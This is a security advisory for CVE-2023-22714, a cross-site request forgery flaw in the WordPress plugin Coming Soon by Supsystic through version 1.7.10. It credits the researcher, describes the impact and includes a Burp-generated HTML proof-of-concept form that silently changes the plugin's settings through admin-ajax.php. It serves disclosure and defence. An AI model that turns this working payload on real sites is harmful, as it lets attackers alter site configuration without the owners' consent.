CVE-2023-22714 - Coming Soon by Supsystic <= 1.7.10 Cross Site Request Forgery

Details

Detail about software affected by CVE-2023-22714.

Parameter	Description
Software	Coming Soon by Supsystic
Type	WordPress Plugin
Vulnerable Version	<= 1.7.10
Classification	Cross Site Request Forgery (CSRF)
Required privilege	Unauthenticated
Publicly disclosed	19.01.2023
Plugin URL	https://wordpress.org/plugins/coming-soon-by-supsystic/

Researcher

This vulnerability was discovered by @yuyudhn.

Description

yuyudhn discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Coming Soon by Supsystic Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has not been known to be fixed yet.

Proof of Concept

CSRF Update Settings:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="opt&#95;values&#91;cs&#95;mode&#93;" value="dsbl" />
      <input type="hidden" name="opt&#95;values&#91;exclude&#95;or&#95;show&#95;links&#93;" value="CSRF&#32;Change&#32;Value" />
      <input type="hidden" name="mod" value="options" />
      <input type="hidden" name="action" value="saveGroup" />
      <input type="hidden" name="pl" value="scs" />
      <input type="hidden" name="reqType" value="ajax" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

References

• CVE-2023-22714 - Patchstack
• CVE-2023-22714 - CVE.org